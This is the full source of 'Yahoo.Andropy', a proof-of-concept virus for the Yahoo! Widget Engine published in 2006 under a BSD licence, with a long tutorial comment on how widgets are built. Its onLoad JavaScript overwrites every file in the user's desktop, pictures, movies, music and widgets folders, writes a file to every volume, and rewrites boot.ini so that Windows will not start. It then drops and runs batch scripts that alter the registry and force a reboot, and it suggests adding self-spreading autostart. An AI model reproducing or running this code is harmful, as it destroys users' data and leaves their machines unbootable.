|| Author: SkyOut/EOF || Back to sources || View project folder ||
<?xml version="1.0" encoding="UTF-8"?>
<widget>
<version>3.0.1</version>
<minimumVersion>2.0</minimumVersion>
//Author, Company and Copyright... does not seem to be used somewhere until now,
//but is planned to be used in near future...
<author>[SkyOut]</author>
<company>[Electrical Ordered Freedom]</company>
<copyright>BSD License</copyright>
//Turn the annoying debu window off
<debug>off</debug>
//Always pop up in the center of the screen!
<option>dontRememberWindowPosition</option>
<!--
Yahoo.Andropy
Coded by: [SkyOut] [Electrical Ordered Freedom]
First of all, when you read the whole code you might notice that I often used " [SkyOut] .... " this is
not because I love myself so much, I just wanted to show how to use that engine and its feature for several things.
The first time I heard of that engine was quite a long time ago, somewhere in winter 2005 I think... I hope that's not wrong...
It was in some computer magazine and it was meant to be something like "coding for everyone"... Yeah in some way I can say it's
true, coding for that engine is really like scripting, nothing difficult, but nevertheless or because of this MUCH fun =)
The idea to make this virus came to me when visiting some sites, where people talked about "customizing XP" and often they did it
by using interesting widgets, so guess what... I visited Yahoo! website and looked for stuff to read to start developing, well and
even this is simple, one beginners guide (~20 sites) and the reference (~300 sites). Oh and very important: The Widget Converter, this
is a tool to build the widgets (*.widget) out of a folder containing the ressources, the good thing is, you can use that converter to
get the folder with its ressources out of the widget file, too. So vice versa! The interesting thing maybe is, that the *.widget file is
nothing more then a *.zip file... Try making a *.zip file out of your ressources and rename *.zip to *.widget, double click and believe!
Structure of such a *.widget folder is simple, but remember to do it like this:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[Folder: Name of your final *.widget file, decide yourself]
===========================================================
+++ +++
+++ including +++
+++ +++
[Folder: " Contents " Name it like this and nothing else!]
==========================================================
->*.kon file (THIS FILE MUST BE IN " Contents " FOLDER!)
->other files... *.js, *.png, *.jpg... -> could also be stored in several subfolders! From here decide
for yourself how many subfolders you want to have, how the structure should be!
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Hmm... enough background information from my side...
for more information visit the site of our friend Yahoo! =) -> www.yahoo.com and widgets.yahoo.com for the widgets, even if you don't
want to develop them, take a look, very cool stuff! I like it!
=========================================================
=========================================================
Tested on: Windows XP SP 2 (Sorry, I don't have a MAC to test it =( ... would have been nice)
Finished: 21. August 2006
Site: www.eof-project.net
Greets to: rRlf (www.rrlf.de.vu), Doom Riderz (www.doomriderz.co.nr) and Cyber Underground Project (cup.su)
-> more links on the site!
Size (*.widget file on my Windows machine): ~95 KB
Payload of Yahoo.Andropy:
-> Try to show example of appending to a file on ~/append.txt
-> Try to show example of prepending to a file on ~/prepend.txt
-> Overwrite all files in desktop, pictures, movies, music, wigdet... folders
-> Copy a text file to the users home directory and every connected drive
-> Open EOF site with users standard web browser =D
-> Check if the running OS is Windows, if yes...
-> Manipulate boot.ini file (must be on C drive), this will result in an error next time user tries to start PC
-> Drop a batch script to access the Registry and write some information there
-> Drop a batch script to shut down the system
=========================================================
=========================================================
Some final thoughts... Well until the end I was not sure how to handle the thing with copying itself somewhere... try yourself would be
the best maybe, if you do so, it could be interesting to make some autostart of the widget, copy somewhere, drop a batch file accessing the
registry and adding the needed entries! Remember the engine has to run so the *.widget file can be execute, but the nice thing about the
engine is, when you execute a widget file without the engine running, it will open the engine automatically, thanks Yahoo! So even
autostarting shouldn't be that hard =) Well what you have seen until now might be, that this engine provides some nice things but often you
have to use extra files, doing it over batch files or whatever to have real access to system... Enjoy!
=========================================================
This code is published under the BSD License. Have fun!
=========================================================
-->
<window>
<name>Andropy</name>
<visible>true</visible>
</window>
<image src="eof1.jpg">
<name>EOF</name>
//Always start with a full opacity
<opacity>100%</opacity>
//This lets the image become brighter -> mouse over effect =)
<onMouseEnter>
EOF.src = "eof2.jpg";
</onMouseEnter>
<onMouseExit>
EOF.src = "eof1.jpg";
</onMouseExit>
</image>
//Execute this code when the widget starts!
<action trigger="onLoad">
<![CDATA[
//This tag will let the XML parser ignore JavaScript signs like opening/closing brackets, else they would be
//interpreted as brackets of XML tags, which would not make much sense for us...
//Appending and prepending shown on two *.txt files, this is only an EXAMPLE... maybe in next version I
//will try to do some "real" appending/prepding to *.widget files, which would be more interesting of course, but
//lets see
//Append some text to the file ~/append.txt (~ = Home Directory, see the basics of *nix based system)
exist = filesystem.itemExists(system.userDocumentsFolder + "/" + "append.txt");
if(exist==true)
{
var data = filesystem.readFile(system.userDocumentsFolder + "/" + "append.txt");
data = data + "\n\n[SkyOut]\n[Electrical Ordered Freedom]";
filesystem.writeFile(system.userDocumentsFolder + "/" + "append.txt", data);
}
else
{
alert("This is a PoC Virus for the Yahoo! Widget Engine, to see appending create a file with the name\n\
\" append.txt \" in your home directory and fill it with some stuff...\n\
then try again!");
}
//Prepend some text to the file ~/append.txt (~ = Home Directory, see the basics of *nix based system)
exist = filesystem.itemExists(system.userDocumentsFolder + "/" + "prepend.txt");
if(exist==true)
{
var data = "[SkyOut]\n[Electrical Ordered Freedom]\n\n";
var data2 = filesystem.readFile(system.userDocumentsFolder + "/" + "prepend.txt");
data = data + data2;
filesystem.writeFile(system.userDocumentsFolder + "/" + "prepend.txt", data);
}
else
{
alert("This is a PoC Virus for the Yahoo! Widget Engine, to see prepending create a file with the name\n\
\" prepend.txt \" in your home directory and fill it with some stuff...\n\
then try again!");
}
//Now all the overwriting functions will be called, the nice thing is: By setting " true " as
//the second paramter of " filesystem.getDirectoryContents(path, true/false); " will give
//you an array with all file names in " path " and RECURSIVE, thanks Yahoo! =)
//Overwrite all files in the desktop folder
fileList = filesystem.getDirectoryContents(system.userDesktopFolder, true);
for(files in fileList)
{
var data = "[SkyOut]\n[Electrical Ordered Freedom]\n\n";
filesystem.writeFile(system.userDesktopFolder + "/" + fileList[files], data);
}
//Overwrite all files in the users pictures folder
fileList = filesystem.getDirectoryContents(system.userPicturesFolder, true);
for(files in fileList)
{
var data = "[SkyOut]\n[Electrical Ordered Freedom]\n\n";
filesystem.writeFile(system.userPicturesFolder + "/" + fileList[files], data);
}
//Overwrite all files in the users movies folder
fileList = filesystem.getDirectoryContents(system.userMoviesFolder, true);
for(files in fileList)
{
var data = "[SkyOut]\n[Electrical Ordered Freedom]\n\n";
filesystem.writeFile(system.userMoviesFolder + "/" + fileList[files], data);
}
//Overwrite all files in the users music folder
fileList = filesystem.getDirectoryContents(system.userMusicFolder, true);
for(files in fileList)
{
var data = "[SkyOut]\n[Electrical Ordered Freedom]\n\n";
filesystem.writeFile(system.userMusicFolder + "/" + fileList[files], data);
}
//Overwrite all files in the users widgets folder ... hehe =)
fileList = filesystem.getDirectoryContents(system.userWidgetsFolder, true);
for(files in fileList)
{
var data = "[SkyOut]\n[Electrical Ordered Freedom]\n\n";
filesystem.writeFile(system.userWidgetsFolder + "/" + fileList[files], data);
}
var data = "========================================\n========================================\n\n\
Hey hey Yahoo! Your engine is cool... really and this is a virus for it...\n\
I began to like scripting for that engine, it was fun coding this PoC, i enjoyed...\n\
and most I like that this will work on Mac OS X, too, that is a cool thing! =D\n\
Best regards\n[SkyOut]\n[Electrical Ordered Freedom]\n\n\
PS: Before I forget, couldn't you add some more features to access the system ;P\n\
would be even more fun!";
//Drop a text file containing the above data into the users home directory...
filesystem.writeFile(system.userDocumentsFolder + "/" + "virus.txt", data);
//...and all volumes on the computer, the nice thing is, this will try to copy to floppy disc
//as well (cd, dvd...), but if there is no floppy connected we WON'T get an error message, very good, very stealth =)
volumes = filesystem.volumes;
for(volume in volumes)
{
filesystem.writeFile(volumes[volume].path + "/" + "virus.txt", data);
}
//Open our site with the users standard web browser =D
openURL("http://www.eof-project.net/");
//Test if we are running on Windows OS
if(system.platform=="windows")
{
//Check if the file exists or not...
exist = filesystem.itemExists("C:\\boot.ini");
if(exist==true)
{
//Change the boot.ini file, next time user tries to start PC he will get an error message
var lines = "[boot loader]\ntimeout=30\ndefault=multi(X)disk(X)rdisk(X)partition(X)\WINDOWS\n[operating systems]\n\
multi(X)disk(X)rdisk(X)partition(X)\WINDOWS=\"Microsoft Windows XP Home Edition\" /fastdetect /NoExecute=OptIn";
filesystem.moveToTrash("C:\\boot.ini");
filesystem.writeFile("C:\\boot.ini", lines);
}
//The language itself does not support Registry access, so we will drop a *.bat file and execute it
var registry = "@echo off\n\
REG ADD HKLM\\System\\Infected\n\
REG ADD HKLM\\System\\Infected /v Virus /t REG_EXPAND_SZ /d Andropy\n\
REG ADD HKLM\\System\\Infected /v Author /t REG_EXPAND_SZ /d SkyOut\n\
REG ADD HKLM\\System\\Infected /v Date /t REG_EXPAND_SZ /d 2006\n\
REG ADD HKLM\\System\\Infected /v Site /t REG_EXPAND_SZ /d www.eof-project.net";
filesystem.writeFile(system.userDocumentsFolder + "/" + "registry.bat", registry);
filesystem.open(system.userDocumentsFolder + "/" + "registry.bat");
//Drop another *.bat file to reboot the system now!
var shutdown = "@echo off\nSHUTDOWN -r";
filesystem.writeFile(system.userDocumentsFolder + "/" + "shutdown.bat", shutdown);
filesystem.open(system.userDocumentsFolder + "/" + "shutdown.bat");
}
]]>
</action>
//The text the user will see when right clicking the image -> Info! White text, red shadowed on black background...
<about-box>
<image>background.png</image>
<about-text>
<data>Andropy</data>
<font>Arial</font>
<size>20</size>
<hOffset>50</hOffset>
<vOffset>50</vOffset>
<color>#ffffff</color>
<shadow>
<color>#ff0000</color>
<hOffset>1</hOffset>
<vOffset>1</vOffset>
</shadow>
</about-text>
<about-text>
<data>[SkyOut]</data>
<font>Arial</font>
<size>20</size>
<hOffset>50</hOffset>
<vOffset>70</vOffset>
<color>#ffffff</color>
<shadow>
<color>#ff0000</color>
<hOffset>1</hOffset>
<vOffset>1</vOffset>
</shadow>
</about-text>
<about-text>
<data>[Electrical Ordered Freedom]</data>
<font>Arial</font>
<size>20</size>
<hOffset>50</hOffset>
<vOffset>90</vOffset>
<color>#ffffff</color>
<shadow>
<color>#ff0000</color>
<hOffset>1</hOffset>
<vOffset>1</vOffset>
</shadow>
</about-text>
<about-text>
<data>Visit: www.eof-project.net</data>
<font>Arial</font>
<size>20</size>
<hOffset>50</hOffset>
<vOffset>130</vOffset>
<color>#ffffff</color>
<shadow>
<color>#ff0000</color>
<hOffset>1</hOffset>
<vOffset>1</vOffset>
</shadow>
</about-text>
<about-text>
<data>Best greets to YAHOO! =) I don't hate ya...</data>
<font>Arial</font>
<size>20</size>
<hOffset>50</hOffset>
<vOffset>170</vOffset>
<color>#ffffff</color>
<shadow>
<color>#ff0000</color>
<hOffset>1</hOffset>
<vOffset>1</vOffset>
</shadow>
</about-text>
<about-text>
<data>I just loved the coding! Go on proving an</data>
<font>Arial</font>
<size>20</size>
<hOffset>50</hOffset>
<vOffset>190</vOffset>
<color>#ffffff</color>
<shadow>
<color>#ff0000</color>
<hOffset>1</hOffset>
<vOffset>1</vOffset>
</shadow>
</about-text>
<about-text>
<data>alternative search engine and go on</data>
<font>Arial</font>
<size>20</size>
<hOffset>50</hOffset>
<vOffset>210</vOffset>
<color>#ffffff</color>
<shadow>
<color>#ff0000</color>
<hOffset>1</hOffset>
<vOffset>1</vOffset>
</shadow>
</about-text>
<about-text>
<data>developing this engine! ;)</data>
<font>Arial</font>
<size>20</size>
<hOffset>50</hOffset>
<vOffset>230</vOffset>
<color>#ffffff</color>
<shadow>
<color>#ff0000</color>
<hOffset>1</hOffset>
<vOffset>1</vOffset>
</shadow>
</about-text>
</about-box>
//Finished!
</widget>